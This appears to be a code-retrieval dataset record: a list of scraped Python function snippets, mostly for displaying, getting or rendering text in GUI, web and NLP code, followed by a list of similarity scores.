[ "def show(self):\n self.set_text(self.read())", "def send_text(self):\n def f():\n self.highlight_input()\n text = self.text_transfer.get()[self.counter]\n self.model = text\n # print(\"yep\")\n self.parent.update_model(self.model.upper())\n print(self.model)\n return f", "def display(self):\n art = \"\\n\".join([\"\".join(row) for row in self.text])\n if self.args.output:\n with open(self.args.output, \"w\") as f:\n f.write(art)\n\n if self.args.verbose:\n print(art)", "def getText():", "def getText():", "def getText():", "def getText():", "def getText():", "def render_text(self):\n if self.text_type == 1:\n return markdown.markdown(self.text)\n else:\n return self.text", "def show_text(text, args):\n return expyriment.stimuli.TextLine(text,\n text_font=args[\"--text-font\"],\n text_size=args[\"--text-size\"],\n text_colour=args[\"stimuli_color\"],\n background_colour=args[\"bg_color\"])", "def text(self) -> None:\n label_space = tk.Label(self)\n label_space.grid(row=0)\n label_book_number = tk.Label(self, text=f'Номер книги:')\n label_book_number.grid(row=1, column=0, ipady=5)\n label_title = tk.Label(self, text='Название книги:')\n label_title.grid(row=2, column=0, padx=5)\n label_author = tk.Label(self, text='Автор:')\n label_author.grid(row=3, column=0, pady=5)\n label_genre = tk.Label(self, text='Жанр:')\n label_genre.grid(row=4, column=0)", "def displayInfo(self, model):\n\t\ttaglist = []\n\t\tfor tag in model.tags:\n\t\t\ttaglist.append(tag.tagname)\n\t\tself.infoText.SetPage(infoTemplate.render(model=model, tags= ','.join(taglist)))", "def text_plot(self):\n if self.stext is not None:\n # Create text object :\n self.stextmesh = visu.Text(text=self.stext, color=self.stextcolor,\n font_size=self.stextsize, pos=self.xyz,\n bold=True, name='SourcesText')\n\n # Set text texture :\n self.stextmesh.set_gl_state('translucent', depth_test=True)\n\n # Apply a transformation to text elements to not cover sources :\n self.stextmesh.transform = vist.STTransform(\n translate=self.stextshift)\n else:\n self.stextmesh = visu.Text(name='NoneText')", "def contents(self, text):\n self.app.contents = text", "def getText(self):", "def use_model(model):\n st.set_page_config(page_title=\"MDNER\", layout=\"wide\")\n streamlit_style = \"\"\"\n\t\t<style>\n\t\t\thtml, body {\n\t\t\t font-family: 'Roboto', sans-serif;\n\t\t\t}\n\t\t</style>\n\t\"\"\"\n st.markdown(streamlit_style, unsafe_allow_html=True)\n st.markdown(\n \"<h1 style='text-align: center; color: dodgerBlue;'>📑 MDNER 🧬</h1>\",\n unsafe_allow_html=True,\n )\n text = st.text_area(\"Text to annotate\", height=300)\n run_button, export_button, _ = st.columns([1, 2, 10])\n with run_button:\n apply = st.button(\"Run\")\n if apply:\n # Load the best model\n nlp = spacy.load(f\"results/models/{model}/model-best\")\n # Define the colors for the entities\n colors = {\n \"TEMP\": \"#FF0000\",\n \"SOFT\": \"#FFA500\",\n \"STIME\": \"#FD6C9E\",\n \"FFM\": \"#00FFFF\",\n \"MOL\": \"#FFFF00\",\n }\n options = {\n \"ents\": [\n \"TEMP\",\n \"SOFT\",\n \"STIME\",\n \"FFM\",\n \"MOL\",\n ],\n \"colors\": colors,\n }\n # Apply the model to the text\n doc = nlp(text)\n # Visualize the entities in html\n html = displacy.render(doc, style=\"ent\", options=options)\n st.divider()\n st.write(html, unsafe_allow_html=True)\n st.divider()\n save_to_json(doc, text, export_button)", "def display_text(self, text):\n self.write_to_serial(':DISP:TEXT \\'' + text + '\\'')", "def astext(self):\n self.elements.update({\n 'body': u''.join(self.body),\n 'indices': 
self.generate_indices()\n })\n return self.render('beamer.tex_t', self.elements)", "def textdisplay(textTitle, analysis):\n try:\n global current_file\n with Database() as database:\n text_owner = database.getTextOwner(textTitle, session['username'])\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER + text_owner\n path = app.config['UPLOAD_FOLDER'] + '/objects/' + textTitle + '.txt'\n with open(path, 'rb') as f:\n current_file = pickle.load(f)\n analysed_texts = current_file.analysed_texts\n text_facts = current_file.stats\n keywords = ''\n for word in text_facts['Key Words']:\n keywords += word[0] + \", \"\n keywords = keywords[:-2]\n return render_template('textdisplay.html',\n title=current_file.title,\n texts=analysed_texts,\n text=analysed_texts[analysis],\n facts=text_facts,\n keywords=keywords,\n owner=text_owner,\n user=session['username'])\n except Exception as e:\n flash(\"Something went wrong, please try again\")\n return redirect(url_for('profile', username=session['username']))", "def text(self) -> str:", "def __repr__(self):\r\n printer = 'text model name: ' + str(self.name) + '\\n'\r\n printer += ' number of words: ' + str(len(self.words)) +'\\n'\r\n printer += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\r\n printer += ' number of stems: ' + str(len(self.stems)) + '\\n'\r\n printer += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\\n'\r\n printer += ' number of different punctuations: ' + str(len(self.punctuation)) \r\n return printer", "def displayText(self):\n if self.entryWidget.get().strip() == \"\":\n tkMessageBox.showerror(\"Tkinter Entry Widget\", \"Enter a text value\")\n else:\n self.file_com.write(self.entryWidget.get().strip()+'\\n')", "def read_all_screen(self):\n full_text = \"\"\n for ypos in range(self.model_dimensions[\"rows\"]):\n full_text += self.string_get(ypos + 1, 1, self.model_dimensions[\"columns\"])\n return full_text", "def showAsString(self, data):\n if isinstance(data, h5py.Dataset):\n data = data.value\n self.__text.setText(str(data))\n self.setCurrentIndex(self.__indexText)", "def result(target_text):\n\n display_text(target_text)\n readability(target_text)", "def get_text(self):", "def record_text(self, **kw):\n return self._text(self._record_template, **kw)", "def show_topic_model_textually(seed_gensim_topic_model, seed_gensim_corpus,\n texts_to_analyze, num_topics):\n print(\"alpha =\", seed_gensim_topic_model.alpha)\n print(seed_gensim_topic_model)\n print(seed_gensim_topic_model.print_topics(num_topics))\n print()", "def __str__(self):\n\t\treturn self.text", "async def text(self, ctx):\n pass", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def __str__(self):\n return self.text", "def save_text(self):\n content = self.get_content()\n if content != '':\n self.text.append((content, self.context, self.ancestor))", "def set_text(self):\n pass", "def showText(self, context, text, size=1, color=colors.WHITE, conversion=True):\n context.print(text, self.components, size, color=color, conversion=conversion)", "def process_text(model_name: str, text: str) -> spacy.tokens.Doc:\r\n nlp = load_model(model_name)\r\n return nlp(text)", "def edit_text(self):\n self.text = self.ui.plainTextEdit.toPlainText()\n sentences_number = count_sentences(self.text)\n self.ui.label.setText(\n f\"{count_sentences(self.text)} sentences in source text\")\n self.ui.spinBox.setMaximum(sentences_number)", "def 
updatetext(self, func, args):\n linelist = func(*args)\n self.headertext.set(linelist[0].capitalize())\n if len(linelist) > 1:\n self.viewlist = linelist[1:]\n self.viewing = 0\n self.intext.set(self.viewlist[self.viewing])\n self.afterid = self.master.after(5000, self.cycle)", "def draw(self, screen):\n lines = self.text.strip().split('\\n')\n y = self.y\n for line in lines:\n self.ui.show_text(line, (self.x, y), 30)\n y += 32", "def display_text(target_text):\n\n print('Text to analyze:')\n print('')\n print('-------TEXT BELOW-------')\n print(target_text)\n print('-------TEXT ENDS-------')\n print('')", "def __repr__(self):\n return self.text", "def __repr__(self):\n return self.text", "def __repr__(self):\n s = 'text model name: ' + self.name + '\\n'\n s += ' number of words: ' + str(len(self.words)) + '\\n'\n s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\n s += ' number of stems: ' + str(len(self.stems)) + '\\n'\n s += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\\n'\n s += ' most common words: ' + str(self.common_word) + '\\n'\n\n return s", "def format_text(text: TTextType) -> typing.Iterator[TViewLine]:\n for line in text.splitlines():\n yield [(\"text\", line)]", "def mytext(x,y,s,**kwargs):\n # we take care of this one\n model = kwargs.pop('model', None)\n if model:\n th = text(x,y,model,**kwargs)\n draw()\n x0,y0,w,h = th.get_window_extent().bounds\n gca().texts.remove(th)\n x = x0\n y = y0\n kwargs['transform'] = matplotlib.transforms.IdentityTransform()\n kwargs['horizontalalignment'] = 'left'\n kwargs['verticalalignment'] = 'baseline'\n# print x,y,kwargs\n return text(x,y,s,**kwargs)", "def on_open_text(self, event):\r\n self.text_id = event.EventObject.text_id\r\n data = self.data[self.text_id]\r\n self.edit_text.Value = data[\"text\"]\r\n self.list_lang.Value = data[\"lang_text\"]\r\n if data[\"filenames\"]:\r\n self.mediactrl.Load(data[\"filenames\"][0])\r\n if self.mc_hack:\r\n wx.CallLater(500, self.mediactrl.Play)", "def get_text(self) -> str:\n return self.text", "def __init__(self, model):\n super().__init__()\n\n # declare model\n self._model = model\n\n self._textBox = QTextEdit(self)\n\n self._executeButton = QPushButton(\"Execute!\", self)\n # self._userBox = QLineEdit(self)\n # self._frameTextLabel = QLabel(\"Frame Number: %s\" % (None), self)", "def render_text(self, text, *args, **kwargs):\n global TEXT_TEMPLATE\n self.render(TEXT_TEMPLATE, text=text, *args, **kwargs)", "def index(request):\n form = textForm()\n return render(request, 'index.html', {'form': form})", "def __repr__(self):\n \n s = 'text model name: ' + self.name + '\\n' \n s += ' number of words: ' + str(len(self.words)) + '\\n'\n s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\n s += ' number of sentence lengths: ' + str(len(self.sentence_lengths)) + '\\n'\n s += ' number of word stems: ' + str(len(self.stems)) + '\\n'\n s += ' number of commas counts: ' + str(len(self.commas_per_sentence)) + '\\n'\n return s", "def get_text(self):\n return self.text", "def text(self):\n return str(self.input.text())", "def set_text(self, T):\n self.text = T", "def __repr__(self):\n s = 'text model name: ' + self.name + '\\n'\n s += ' number of words: ' + str(len(self.words)) + '\\n'\n s += ' number of word lengths: ' + str(len(self.word_lengths)) + '\\n'\n s += ' number of stems: ' + str(len(self.stems)) + '\\n'\n s += ' number of sentence lengths: ' + str(len(self.sentence_lengths))\\\n + '\\n'\n s += ' number of punctuation types: ' + 
str(len(self.punctuation))\n return s", "def display_text(self, text):\n self.update_screen_size()\n self.stdscr.erase()\n for line in text:\n self.stdscr.addstr(f'{PADCHAR}{line}\\n')\n self.stdscr.addstr(PADCHAR)\n self.get_key()", "def edit(self, text):\n return self._edit_engine(text, break_on_success=False)", "def __repr__(self) -> str:\n return f\"{self.text}\"", "def showcontents(self):\n # See ToolTip for an example\n raise NotImplementedError", "def text(self):\n return self.full_text", "def getText(self):\n return self.text", "def getText(self):\n return self.text", "def visualize_model(self):\n if self.model is None:\n print(\"%s.visualize: implement me\" % (self.__class__.__name__))", "def display_text(self, display_text):\n\n self._display_text = display_text", "def draw(self):\n if self.dirty:\n self._render()\n for text in self.text_lines:\n text.draw()", "def main():\n logging.basicConfig(level=logging.WARN)\n\n text = extract()\n text, char_indices, indices_char, x, y = transform(text)\n model(text, char_indices, indices_char, x, y)\n\n pass", "def obtain_text():\n pass", "def __repr__(self):\n s= 'text model name: ' + self.name + '\\n'\n s+= 'number of words: ' + str(len(self.words)) + '\\n'\n s+='number of word lengths: ' + str(len(self.word_lengths))+'\\n'\n s+='number of word stems: ' + str(len(self.stems)) + '\\n'\n s+='number of sentence lengths: ' + str(len(self.sentence_lengths)) +'\\n'\n s+='number of word suffixes: '+ str(len(self.endings))\n \n return s", "def get_text(self):\n return self.get_property('text')", "def display_text(self, text, size=None, colr=None,\r\n x = None, y = None,\r\n new_line = None):\r\n if size is None:\r\n size = self.dt_size\r\n self.size = size\r\n if colr is None:\r\n colr = self.text_color\r\n self.text_color = colr\r\n if new_line is not None:\r\n if x is not None or y is not None:\r\n raise Exeception(\"Must not have new_line and x,y\")\r\n else:\r\n if x is not None or y is not None:\r\n new_line = False\r\n else:\r\n new_line = True\r\n if new_line:\r\n x = self.dt_x = self.disp_left\r\n self.dt_y -= size*self.font_size_to_ch\r\n y = self.dt_y\r\n #print(f\"new_line: y:{y} dt_y:{self.dt_y}\")\r\n else:\r\n if x is None:\r\n x = dt_x\r\n self.dt_x = x\r\n if y is None:\r\n y = self.dt_y\r\n self.dt_y = y\r\n #print(f\"display_text: text:{text} x:{x}, y:{y}\")\r\n tu.penup()\r\n if y < self.disp_bottom + self.disp_boarder:\r\n continue_msg = \"Press ENTER to continue\"\r\n inp = input(continue_msg)\r\n self.clear_text() # Only option \r\n \r\n tu.goto(x,y)\r\n tu.pendown()\r\n \r\n tu.color(colr)\r\n font = (\"Arial\", size, \"normal\")\r\n #print(f\"colr:{colr} text:{text} font:{font}\")\r\n #print(f\"xcor():{tu.xcor()} ycor():{tu.ycor()}\")\r\n tu.write(text, align=\"left\", font=font)", "def editText(self, text, jumpIndex=None, highlight=None):\n try:\n import gui\n except ImportError, e:\n print 'Could not load GUI modules: %s' % e\n return text\n editor = gui.EditBoxWindow()\n return editor.edit(text, jumpIndex=jumpIndex, highlight=highlight)", "async def getDisplayText(self):\n display_text = await self.director.getItemVariableValue(\n self.item_id, \"DISPLAY_TEXT\"\n )\n return display_text", "def text(self, str):\n self.__r.t._setText(_to_unicode(str))", "def test_model():\n test_text = \"what is the price of jug?\"\n model = spacy.load(\"../model/custom_ner_model\")\n doc = model(test_text)\n for ent in doc.ents:\n print(ent.text, ent.start_char, ent.end_char, ent.label_)", "def GetText(self):\r\n \r\n return 
self._text", "def refresh(self, event):\n self.updatetext(self.textfunc, self.textargs)", "def text(self, text, color=defcolor):\n # Line height including spacing.\n lineh = self.font['height'] + 1\n # Calculate characters we can have per line.\n chars_per_line = self.x // (self.font['width'] + 1)\n # Split the text into its lines.\n linelist = striptomatrix.listto2d(text, chars_per_line)\n # How many lines can we fit on the screen?\n maxlines = self.y // (self.font['height'] + 1)\n # If the text doesn't fit the screen, scroll:\n if len(linelist) > maxlines:\n self.reset()\n self.scrollproc = threading.Thread(target=self.scroll_text,\n args=(text, color))\n self.killedevent.wait()\n self.scrollproc.start()\n # If the text does fit\n else:\n self.insert_lines(linelist, color)\n self.show()", "def show(self):\n import IPython.display\n disp = IPython.display.HTML(self.render())\n return IPython.display.display(disp, display_id=str(id(self)))", "def get_plain_text(self):\n raise NotImplementedError(\"get_plain_text is not implemented\")", "def main_window_text(self) -> None:\n tk.Label(text='Название книги:').grid(row=0, column=0, padx=10, pady=10)\n tk.Label(text='Автор:').grid(row=1, column=0, padx=10)\n tk.Label(text='Жанр:').grid(row=2, column=0, padx=10, pady=10)\n entry_title = tk.Entry(width=45)\n entry_title.grid(row=0, column=1, sticky=tk.W)\n entry_author = tk.Entry(width=45)\n entry_author.grid(row=1, column=1, sticky=tk.W)\n entry_genre = tk.Entry(width=45)\n entry_genre.grid(row=2, column=1, sticky=tk.W)", "def text(self) -> str:\n return self._impl.get_text()", "def WriteText(self, text):\n print(text)", "def __unicode__(self):\r\n return self.text", "def __unicode__(self):\r\n return self.text", "def __unicode__(self):\r\n return self.text", "def __unicode__(self):\r\n return self.text", "def on_lineEdit_textChanged(self, p0):\n # str_me = \"我爱我的祖国\"\n # self.lineEdit.setText(str_me) # 设置单行文本内容\n input_text = self.lineEdit.text()\n self.textEdit.setPlainText(input_text)\n # self.textEdit.setHtml(input_text) # 显示Html,如 <font color='red' size='20'>HELLO!</font>\n a = self.textEdit.toPlainText()\n print(a)", "def showText(self, window, text, color=None, size=None):\n if not color: color = self.text_color\n if not size: size = self.text_size\n self.center.showText(window, text, color=color, size=size)", "def getTextFromSpeak(self):\n raise NotImplementedError", "def ui_output_text(morzeText: str):\n print(morzeText)", "def display_eng(self):\n self.clear_terminal()\n self.menu_eng()\n self.handle_selection_eng()", "def visualize(model, num_topics=num_topics, num_words=num_words,\r\n vocab=idx2word, show_emb=True,\r\n tokenizer=tokenizer, bert_model=bert):\r\n model.eval() # set the net in evaluation mode\r\n # set a few words to query\r\n queries = ['insurance', 'weather', 'particles', 'religion', 'man', 'love',\r\n 'intelligence', 'money', 'politics', 'health', 'people', 'family']\r\n\r\n ## visualize topics using monte carlo (sampling from the posterior I guess)\r\n with torch.no_grad(): # no gradients computation - makes forward pass lighter\r\n print('-' * 20)\r\n print('Visualize topics...')\r\n topics_words = []\r\n gammas = model.get_beta() # topics distributions\r\n for k in range(num_topics):\r\n gamma = gammas[k]\r\n top_words = list(gamma.cpu().numpy().argsort()[-num_words + 1:][::-1])\r\n topic_words = [vocab[a] for a in top_words]\r\n topics_words.append(' '.join(topic_words))\r\n print('Topic {}: {}'.format(k, topic_words))\r\n\r\n if show_emb:\r\n ## visualize word 
embeddings by using V to get nearest neighbors\r\n print('-' * 20)\r\n print('Visualize word embeddings by using output embedding matrix')\r\n\r\n # extract the embeddings from the model!\r\n try:\r\n embeddings = model.rho.weight # Vocab_size x E\r\n except:\r\n embeddings = model.rho # Vocab_size x E\r\n\r\n for word in queries:\r\n # extracting Bert representation of the word\r\n inputs = tokenizer(word, return_tensors=\"pt\")\r\n outputs = bert_model(**inputs).last_hidden_state[0]\r\n outputs.requires_grad = False\r\n if outputs.size()[0] > 1: # aggregate\r\n outputs = torch.sum(outputs, dim=0)\r\n nns = utils.nearest_neighbors(q=outputs,\r\n embeddings=embeddings, vocab=list(vocab.values()))\r\n print('word: {} .. neighbors: {}'.format(word, nns)) # utility function\r", "def Add_Text( self, th ):\r\n self.text_handle = th", "def text_reader(file_path,text_edit):\n\n parent.ui.textEdit_design_image.clear()\n path = os.getcwd()+'\\media\\docs' + file_path\n f = open(path,'r');\n for x in f:\n text_edit.insertPlainText(x)", "def show_text(self, lang):\n return markdown(self.text % dict(\n [(k, e_html(unicode(v), True)) for k, v in self.vars.items()]\n ), output_format=\"html5\")", "def printModel(self):\n print(self.model)", "def Text(self):\n return self._text", "def _draw_line_text(self):\n self._line_text.set_text(self.model.get_current_line())" ]
[ "0.64818233", "0.6356436", "0.6119905", "0.5938623", "0.5938623", "0.5938623", "0.5938623", "0.5938623", "0.5912198", "0.5831747", "0.5817723", "0.5801984", "0.57914543", "0.5775937", "0.5744499", "0.57407993", "0.5716162", "0.5654628", "0.5648894", "0.5643585", "0.56414855", "0.56351936", "0.56199723", "0.56030965", "0.556664", "0.5554339", "0.55513424", "0.55486286", "0.55469596", "0.5538714", "0.55380493", "0.55380493", "0.55380493", "0.55380493", "0.55380493", "0.55353034", "0.55309474", "0.5498713", "0.5473159", "0.54588044", "0.54569787", "0.54511464", "0.5417461", "0.54156077", "0.54156077", "0.5407263", "0.5400165", "0.53936696", "0.5356481", "0.534389", "0.5341324", "0.53219986", "0.5307917", "0.5296975", "0.52843094", "0.5277901", "0.52693117", "0.52629006", "0.5257897", "0.5256543", "0.52547526", "0.5245514", "0.52336544", "0.5222657", "0.5222657", "0.5221348", "0.52180874", "0.52153945", "0.52055806", "0.5203599", "0.5197284", "0.5195397", "0.5184675", "0.5180702", "0.5180693", "0.51768273", "0.51637256", "0.5155399", "0.515386", "0.51522326", "0.5150645", "0.5147816", "0.5147401", "0.5136565", "0.5135977", "0.5131778", "0.5131778", "0.5131778", "0.5131778", "0.5127327", "0.512545", "0.5121425", "0.511591", "0.51124585", "0.5111461", "0.51111627", "0.51064765", "0.5099283", "0.50991464", "0.50958407", "0.50953907" ]
0.0
-1
takes a file and turns it into a str
def readTextFromFile(self, filename):
    f = open(filename)
    self.text = f.read()
    f.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def file2str(file):\n with open(file, \"r\") as textFile:\n return textFile.read()", "def file_to_string(path_to_file):\n\t\twith open(path_to_file, 'r') as f:\n\t\t\tcontent = f.read()\n\t\treturn content", "def txt2str(file: str) -> str:\n return get_first_line(file)", "def file_to_str(fname):\n data = None\n # rU = read with Universal line terminator\n with open(fname, 'rU') as f:\n data = f.read()\n return data", "def file_to_str(filename):\n with open(filename) as f:\n return f.read().lower() # Case is lowered to prevent regex mismatches.", "def file_to_str(filename):\n with open(filename) as f:\n return f.read().lower() # Case is lowered to prevent regex mismatches.", "def file_to_string(file_name):\n with open(file_name, 'r') as f:\n text = f.read()\n # delete original file\n os.remove(file_name)\n return text", "def file_to_string(file_path):\n data = ''\n try:\n with open(file_path, 'r') as file:\n data = file.read()\n file.close()\n except FileNotFoundError as err: # Sublime give an error, but it's not.\n print(Bcolors.FAIL + 'ERROR: ' + file_path + ' not found.' + Bcolors.ENDC)\n print(str(err))\n sys.exit(2)\n except PermissionError as err:\n print(Bcolors.FAIL + 'ERROR: ' + file_path + ', Permission Denied.' + Bcolors.ENDC)\n print(str(err))\n sys.exit(2)\n return data", "def load_file():\n s = ''\n\n with open(FILE_PATH) as f:\n for line in f:\n # .rstrip method gets rid of new line \"\\n\" characters\n s = s + line.rstrip() \n return s", "def local_file_as_string(self, file_path):\n with open(file_path, 'rb') as file:\n string = file.read().decode('utf-8')\n return string", "def _make_string(self, filename):\n\n if not os.path.isfile(filename):\n str = \"ERROR: Could not find specified XML file %s.\" % filename\n PRINT.info(str)\n raise OSError(str)\n\n return open(filename).read()", "def ReadFileIntoString(filepath):\n with open(filepath, 'r') as file_handle:\n contents = file_handle.read()\n return contents", "def get_fable_string():\n f = open(\"fable.txt\", \"r\")\n fable = str(f.read())\n f.close()\n return fable", "def read_file(file):\n with open(file, 'r') as f:\n file_string = f.read()\n return file_string", "def convert_vtt_to_str(file):\n if \".vtt\" in file:\n vtt_to_srt(file)", "def read_file(file) -> str:\n file = open(file, \"r\")\n my_string = file.read()\n return get_clean_text(my_string)", "def read_file(self, file: Path) -> str:\n with open(file) as f:\n return f.read()", "def get_file_content(self, file_name: str):\n file_name = Path(__file__).absolute().parents[1].joinpath(file_name)\n try:\n with file_name.open('r') as file:\n intermediate = file.readlines()\n return ''.join(intermediate)\n except FileNotFoundError as message:\n self.logger.error(message)\n return ''", "def ofile_string(self):\n fp = self.ofile_handle()\n if (fp):\n return \"\\n\".join([line.rstrip() for line in fp])\n return None", "def efile_string(self):\n fp = self.efile_handle()\n if (fp):\n return \"\\n\".join([line.rstrip() for line in fp])\n return None", "def read_file(file_path):\n\n file_string = ''\n\n with open(file_path, 'r', newline='') as file:\n for line in file:\n file_string = file_string + line.rstrip('\\n')\n\n return file_string", "def get_file_text(file_name):\n\tf = open(file_name, 'r')\n\ttext = f.read()\n\treturn text", "def _read_file(self) -> str:\n with open(self._file_name) as fp:\n return fp.read()", "def load_text_data(filepath: str) -> str:\n with open(filepath) as text_file:\n text_from_file = text_file.read()\n\n return str.strip(text_from_file) # 
str.strip removes leading/trailing whitespace", "def replace_with_file_contents(fname):\n try:\n with open(os.path.expanduser(fname[0])) as source_file:\n result = source_file.read()\n except IOError:\n result = '< %s' % fname[0] # wasn't a file after all\n\n # TODO: IF pyparsing input parser logic gets fixed to support empty file, add support to get from paste buffer\n return result", "def _file_read(self, file: str) -> str:\n with open(f\"tests/resources/{file}\", \"r\") as fs:\n result = \"\\n\".join(fs.read().splitlines())\n return result", "def __file_from_int_to_str(file: int) -> str:\n # Warning, my own, not very well tested implementation of base26 converter\n output_chars = 1\n while (len(ascii_lowercase)) ** output_chars <= file:\n output_chars += 1\n values = []\n for i in range(output_chars):\n val = (file // len(ascii_lowercase) ** i) % (len(ascii_lowercase))\n values.append(val)\n\n return \"\".join(ascii_lowercase[x] for x in reversed(values))", "def read_as_text(filename: str) -> str:\n with open(filename) as file_handle:\n txt = file_handle.read()\n return txt", "def read_from_file(filename):\n with open(filename, 'r') as f:\n lines = [line for line in f]\n\n return \"\".join(lines)", "def read_data() -> str:\n with open('input.txt') as input_file:\n return input_file.read()", "def read_file(file):\n try:\n with open(file, \"r\") as f:\n content = f.read().replace(\"\\n\", \"\")\n return content\n except:\n return f\"[ERROR]: could not open '{file}'\"", "def parse(filename: str) -> str:\n with open(filename) as file:\n return file.readline().strip()", "def get_text_from_file(filepath):\n with open(filepath, 'r') as f:\n return f.read()", "def contents(file):\n with open(file) as f:\n return f.read()", "def _get_string(self):\n result = self.sfile.readline().rstrip('\\n')\n return result", "def getStoryString():\n return open(\"story.txt\", \"r\").read()", "def getStoryString():\n return open(\"story.txt\", \"r\").read()", "def read_file(input_file):\n\n\ttext = open(input_file)\n\traw = text.read()\n#\tdecoded = raw.decode('utf8').encode('ascii', 'replace')\n\tdecoded = raw.decode('utf8')\n\n\t#moves this through the html cleaner\n\ttext = plaintext(decoded)\n\n\treturn text", "def format_filename(fname):\n\treturn ''.join(convert_valid(one_char) for one_char in fname)", "def source_file_contents(source_dir, file_name):\n file_n_path = join(source_dir, file_name)\n with open(file_n_path, encoding='utf-8') as checked:\n return checked.read().rstrip()", "def file_to_txt(file_path, dst_dir, new_file_name=None, ret_fname=False,\n clean_path=False):\n if clean_path:\n try:\n file_path = _filepath_clean(file_path)\n except IOError:\n sys.stdout.write('unable to clean file_name %s \\n' % file_path)\n file_name = os.path.split(file_path)[1]\n name, ext = os.path.splitext(file_name)\n ext = re.sub(r'\\.', '', ext)\n if new_file_name:\n file_name = new_file_name\n converter_func_name = '_%s_to_txt' % ext\n if converter_func_name in globals().keys():\n # calls one of the _to_txt()\n out = eval(converter_func_name)(file_path, dst_dir, file_name)\n if out:\n sys.stdout.write('unable to process file %s' % file_path)\n if ret_fname:\n return file_name\n else:\n sys.stdout.write('file type %s not supported, skipping %s \\n' %\n (ext, file_name))", "def read_text_file(str_name_file: str):\n content: str = ''\n with open(str_name_file, mode=\"r\", encoding='utf-8') as file:\n print(\"file being read: \" + str_name_file + \"\\n\")\n content = file.read()\n return content", "def 
openFile(filepath):\n assert checkExistenceFile(filepath), \"filepath does not exist\"\n with open(filepath, \"r\", encoding=\"utf-8\") as f:\n text = \" \".join(map(lambda x: x.rstrip(\"\\n\"), f.readlines()))\n return text", "def format(self):\n self.clear_whitespace()\n self.to_ascii()\n return self._filename", "def get_file_data(file_name):\r\n try:\r\n with open(file_name, 'rb') as input_file:\r\n data = input_file.read()\r\n return data\r\n except Exception as err:\r\n return str(err).encode()", "def get_json_str(self):\n\n with open(self.path, mode='r', encoding='utf-8') as file:\n return file.read()", "def format_filename(fname):\n return ''.join(convert_valid(one_char) for one_char in fname)", "def fileread(self, filename):\n data = None\n f = open(filename, 'r')\n data = f.read()\n f.close()\n try:\n data = data.decode()\n except (UnicodeDecodeError, AttributeError):\n data = data.encode(\"utf-8\")\n\n return data", "def srt_to_txt(srt_file):\n text = ''\n for index, item in enumerate(srt_file):\n if item.text.startswith(\"[\"):\n continue\n text += \"(%d) \" % index\n text += item.text.replace(\"\\n\", \"\").strip(\"...\").replace(\n \".\", \"\").replace(\"?\", \"\").replace(\"!\", \"\")\n text += \". \"\n return text", "def str_for_file(xs):\n # Encode to ASCII.\n xs = xs.encode('ascii', 'ignore').decode()\n\n # Convert characters.\n convert = {':': ',',\n ';': ','}\n for char_from, char_to in convert.items():\n print(xs, char_from, char_to)\n xs = xs.replace(char_from, char_to)\n\n # Finally, whitelist characters.\n allowed = uppercase + lowercase + digits + '- !()-_=+\\'\",.'\n return ''.join(filter(lambda x: x in allowed, xs))", "def readfile(filename):\n\n infile = open(filename, \"r\") # open file for reading\n\n # Use Python's file read function to read the file contents\n filetext = infile.read().splitlines()\n\n infile.close() # close the file\n\n return filetext # the text of the file, as a single string", "def get_text(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n file_text = file.read()\n return file_text", "def read_file(filename):\n return open(filename).read()", "def _fn2ascii(self, filename): \n nameBase, ext = Path(Path(filename).basename()).splitext()\n try: nameBase.encode('ascii')\n except UnicodeEncodeError:\n nameBase = nameBase.encode('utf-8').encode('hex')\n try:\n ext = ext.encode('ascii')\n except UnicodeEncodeError:\n ext = ext.encode('utf8').encode('hex')\n return str(nameBase + ext)", "def read(file):\n with open(file, 'r') as file:\n return file.read()", "def image_file_to_string(filename, cleanup = cleanup_scratch_flag, graceful_errors=True, lang='eng'):\n\ttry:\n\t\ttry:\n\t\t\tcall_tesseract(filename, scratch_text_name_root)\n\t\t\ttext = retrieve_text(scratch_text_name_root, lang)\n\t\texcept Tesser_General_Exception:\n\t\t\tif graceful_errors:\n\t\t\t\tim = Image.open(filename)\n\t\t\t\ttext = image_to_string(im, cleanup)\n\t\t\telse:\n\t\t\t\traise\n\tfinally:\n\t\tif cleanup:\n\t\t\tperform_cleanup(scratch_image_name, scratch_text_name_root)\n\treturn text", "def open_and_read_file(file_path):\n\n # Open file and read into memory\n text = open(file_path).read().rstrip()\n\n # Replace newlines with space\n #text = text.replace('\\n', ' ')\n\n return text", "def read_text_from_file(file_path):\n validate_txt_extension(file_path)\n with open(file_path) as file:\n # Read all the lines from the file, and concatenate into a single string.\n return ''.join([line for line in file])", "def getOneFileContent(fpath):\n\twith 
open(fpath, 'r') as contentFile:\n\t\tdocStr = contentFile.read()\n\treturn docStr", "def read_file(filepath: str) -> str:\n with open(filepath, \"r\") as filep:\n return filep.read()", "def read_file(file_name, enc=\"latin-1\"):\n f = open(file_name, \"r\", encoding=enc)\n content = \"\".join(f.readlines())\n f.close()\n return content", "def image_file_to_string(filename, lang = _language, cleanup = cleanup_scratch_flag, graceful_errors=True):\n\ttry:\n\t\ttry:\n\t\t\t# print filename\n\t\t\tcall_tesseract(filename, scratch_text_name_root, lang)\n\t\t\ttext = util.retrieve_text(scratch_text_name_root)\n\t\texcept errors.Tesser_General_Exception:\n\t\t\tif graceful_errors:\n\t\t\t\tim = Image.open(filename)\n\t\t\t\tprint(filename)\n\t\t\t\tprint('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!对图像进行特殊处理')\n\t\t\t\ttext = image_to_string(im, cleanup)\n\t\t\telse:\n\t\t\t\traise\n\tfinally:\n\t\tif cleanup:\n\t\t\tutil.perform_cleanup(scratch_image_name, scratch_text_name_root)\n\treturn text", "def read_file(path): #TODO implementme, handling paths more intelligently\n f = open(path, \"r\")\n string = f.read()\n f.close()\n return string", "def read_file(self, file):\n buffer = ''\n for line in file.readlines():\n line = line.strip()\n if not line.startswith('#'):\n buffer += ' ' + line\n return buffer", "def readfile(path: Union[str, Path]) -> str:\n with open(path) as infile:\n return infile.read()", "def read_file(name_file):\n with open(name_file, 'r') as file:\n return file.read()", "def 